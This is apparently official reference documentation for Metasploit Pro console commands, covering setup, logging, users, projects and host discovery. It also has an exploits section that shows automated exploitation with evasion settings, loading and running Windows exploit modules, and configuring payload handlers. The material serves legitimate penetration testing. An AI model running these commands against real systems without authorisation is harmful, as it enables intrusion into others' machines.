Managing Metasploit
Pro Console Commands
This is a list of common Pro Console commands that you can use as a quick reference. If something is not listed here, type help in the console for a list of all options.
Launch Metasploit
The following commands launch and quit Metasploit.
Launch on Windows
$ msf > cd /metasploit $ msf > console.bat
Launch on Linux
$ msf > cd /opt/metasploit $ msf > sudo msfpro
Quit
$ msf > quit
See Available Commands
$ msf > help
You can prepend help to any command to see a list of options available.
msf > help handler
Usage: handler [options]
Spin up a Payload Handler as a background job.
OPTIONS:
-H <opt> The RHOST/LHOST to configure the handler for
-P <opt> The RPORT/LPORT to configure the handler for
-e <opt> An Encoder to use for Payload Stage Encoding
-h Help Banner
-n <opt> The custom name to give the handler job
-p <opt> The payload to configure the handler for
-x Shut the Handler down after a session is established
msf > help workspace
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old> <new> Rename workspace
workspace -h Show this help informationPro Help Page
These are all the options available from $ msf > help.
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Developer Commands
==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or Framework
reload_lib Reload Ruby library files from specified paths
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the databaseLogs
The following commands allow you to control the logging from Metasploit Pro.
Logging Input and Output from the Console
Use the ConsoleLogging option to store information that the Pro Console inputs and outputs into a log.
msf-pro > setg ConsoleLogging y Console logging is now enabled.
Changing the Log Verbosity
Use the LogLevel option to set the verbosity of the logs. Set the value between 1 and 5.
msf-pro > setg LogLevel 3 LogLevel => 3
Logging Input and Output for a Session
Use the SessionLogging option to store information that msfconsole inputs and outputs about a session into a log.
msf-pro > setg SessionLogging y Session logging will be enabled for future sessions.
Users
The following commands relate to user management .
Change the Current User
Use the pro_user command and supply the user name as the argument to change the current user.
msf-pro > pro_user joe
{*} Changed pro_user to joe
View a List of Users
Use the pro_user command and the -l option to view a list of users.
msf-pro > pro_user -l
Username Full Name Email Admin?
======== ========= ===== ======
joe
johnRunning Services
To stop, start or restart services , use the ctlscript.sh script.
msadmin@ubuntu:~$ sudo '/opt/metasploit/ctlscript.sh'
usage: /opt/metasploit/ctlscript.sh help
/opt/metasploit/ctlscript.sh (start|stop|restart|status)
/opt/metasploit/ctlscript.sh (start|stop|restart|status) postgresql
/opt/metasploit/ctlscript.sh (start|stop|restart|status) prosvc
/opt/metasploit/ctlscript.sh (start|stop|restart|status) metasploit
/opt/metasploit/ctlscript.sh (start|stop|restart|status) worker
help - this screen
start - start the service(s)
stop - stop the service(s)
restart - restart or start the service(s)
status - show the status of the service(s)### To start To start Metasploit:
/opt/metasploit/ctlscript.sh start
To start a specific service:
/opt/metasploit/ctlscript.sh start worker
Chain Commands
Use the argument -- -x to chain commands together. This works only when launching Metasploit Pro. The argument will not work in an existing Metasploit Pro session. Use ; to chain the commands together.
$ sudo /opt/metasploit/msfpro -- -x 'setg lhost 1.2.3.4'
$ sudo /opt/metasploit/msfpro -x 'use multi/handler; set lport 3333; set lhost eth0'If you are missing the extra two dashes, -- -x, the command fails with the error invalid option: -x (OptionParser::InvalidOption).
Exploits
These commands are related to automated exploits and manual exploits .
Automated Exploits
Automated exploits choose the exploit based on host and vulnerability data.
Run an automated exploit Pass in the host IP address as the option.
msf-pro > pro_exploit 192.168.184.139
Define a Host Blacklist for an Automated Exploit
Use the -b option to define a blacklist.
msf-pro > pro_exploit 192.168.184.0/24 -b 192.168.184.138
Define a Port Blacklist for an Automated Exploit
Use the pb option to specify a list of ports to exclude.
msf-pro > pro_exploit 192.168.184.0/24 -pb 22-23Perform a Dry Run of an Automated Exploit
Use the -d option to perform a dry run of the automated exploit.
msf-pro > pro_exploit 192.168.184.0/24 -dSet the Application Evasion Level for an Automated Exploit
Use the -ea option to set the evasion level for an automated exploit. You can assign an evasion level of ‘none’, ‘low’, ‘medium’, and ‘high’.
msf-pro > pro_exploit 192.168.184.0/24 -ea lowSet the TCP Evasion Level
Use the -et option to set the TCP evasion level. You can assign an evasion level of ‘none’, ‘low’, ‘medium’, and ‘high’.
msf-pro > pro_exploit 192.168.184.0/24 -ea lowSet the Payload Connection Type
Use the -m option to set the payload type for an automated exploit. The payload types are auto, bind, and reverse
msf-pro > pro_exploit 192.168.184.0/24 -m bindSet the Minimum Rank
Use the -r option to set the payload type for an automated exploit. The minimum rank settings are ‘low’, ‘average’, ‘normal’, ‘good’, ‘great’, and ‘excellent’.
msf-pro > pro_exploit 192.168.184.0/24 -r goodManual Exploits
Manual exploits are exploits that you configure to run against a target.
Search
Use the search command along with the search operator to search for a module
msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067Show All Exploit Modules
Use the show command to view a list of the exploits that are available. This command will take a long time since there are thousands of exploit modules available.
msf-pro > show exploitsLoad a Module
Use the use command to load an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) >Reset the command prompt
Use the back command to reset the prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >Show Module Options
Use the show command to view a list of options that are available for a particular module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show optionsShow Required Options
To find out what options are required, you can use the show missing command.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show missingShow Advanced Options
Use the show command to view a list of advanced options that are available for an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show advancedSet Options
Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:
msf-pro exploit (ms04_045_wins) > show options
Name Current Setting Required Description
---- ------- ------- -------- ------------
RHOST
RPORT 445
msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1Show Module Targets
Use the show targets command to view a list of potentially vulnerable targets.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id Name
-- -----
0 Windows 2000 EnglishCheck Target Vulnerability
Use the check command to determine if a target is vulnerable to a particular exploit.
msf-pro > use exploit/windows/smb/ms08_067_netapi
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
[+] 192.168.55.1:445 - the target is vulnerable.Set the Exploit Target
Use the set target command to specify a target for the exploit.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id Name
-- -----
0 Windows 2000 English
msf-pro exploit (ms04_045_wins) > set target 0Run an Exploit
Use the exploit or run command to run an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > runReload an Exploit
Use the reload command to refresh the metadata and methods for an exploit.
msf-pro exploit (ms04_045_wins) > reloadHost
The following commands are related to hosts .
Discovery Scan
Use the pro_discover command to perform a discovery scan.
msf-pro > pro_discover 192.168.0.1Run a Credentialed Scan
Use the following command if you have SMB credentials that you want to specify for Windows hosts.
-sdoption defines the SMB domain.-suoption specifies the user name.-spoption specifies the password.
msf-pro > pro_discover 192.168.0.1 -sd workgroup -su root -sp rootView Hosts
Use the hosts command to view a list of hosts that the database contains.
msf-pro > hostsAdd a Host
Use the hosts command and the -a option to add a host to the current workspace.
msf-pro > hosts -a 192.168.0.3Delete a Host
Use the hosts command and the -d option to delete a host from the current workspace:
msf-pro > hosts -d 192.168.0.3Connect to a Host
Use the connect command to communicate with a host. You must supply the host address and port that you want to connect to.
msf-pro > connect 192.168.0.1 22View Hosts That Are Up
Use the hosts command and the -u option to view a list of hosts that are up.
msf-pro > hosts -uProjects
The following commands are related to managing projects in Metasploit Pro.
Create a Project
Use the pro_project command and the -a option to create a project. The project that you create becomes the current project.
msf-pro > pro_project -a HRView the Current Project
Use the pro_project command to view the current project.
msf-pro > pro_projectChange Project
Use the pro_project command to change the current project
If you need to specify a project that contains spaces, you must enclose the project name in quotes. For example, use pro_project “IT Dept”.
msf-pro > pro_project HRDelete a Project
Use the -d option to delete a project. This deletes the project, which includes the hosts, credentials, evidence, and any other data related to the project.
msf-pro > pro_project -d ACC